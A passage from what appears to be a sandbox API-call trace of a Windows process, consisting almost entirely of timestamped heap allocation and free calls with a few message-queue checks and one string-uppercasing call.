hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0176.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0176.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0176.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0176.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.110] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.110] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0176.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0176.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0176.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0176.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0176.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.112] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0176.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0176.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, 